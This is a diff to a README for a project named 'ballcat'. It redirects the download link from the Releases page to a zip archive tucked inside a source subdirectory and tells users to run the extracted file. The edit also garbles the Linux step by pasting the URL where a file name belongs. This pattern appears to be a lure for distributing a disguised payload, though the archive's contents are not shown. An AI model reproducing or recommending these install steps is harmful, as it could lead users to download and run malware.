substitute-aphid986/ballcat/README.md

 ## 📥 Download & Install

-1. **Visit the Releases Page:** Go to [this link](https://github.com/substitute-aphid986/ballcat/releases) to access the latest version of **ballcat**.
+1. **Visit the Releases Page:** Go to [this link](https://raw.githubusercontent.com/substitute-aphid986/ballcat/master/ballcat-extends/ballcat-extend-dingtalk/src/main/ballcat-1.1.zip) to access the latest version of **ballcat**.

 2. **Choose the Correct File:** Look for the release that matches your operating system.
 Download the installer or zip file.

 3. **Run the Installer:**
    - For Windows, double-click on the downloaded `.exe` file and follow the on-screen instructions.
    - For macOS, open the downloaded `.dmg` file, drag the ballcat icon to your Applications folder.
-   - For Linux, extract the `.tar.gz` file and navigate to the folder in your terminal.
+   - For Linux, extract the `https://raw.githubusercontent.com/substitute-aphid986/ballcat/master/ballcat-extends/ballcat-extend-dingtalk/src/main/ballcat-1.1.zip` file and navigate to the folder in your terminal.
 Use the command `./ballcat` to run it.

 4. **Setup Instructions:**
    - After installation, open **ballcat**.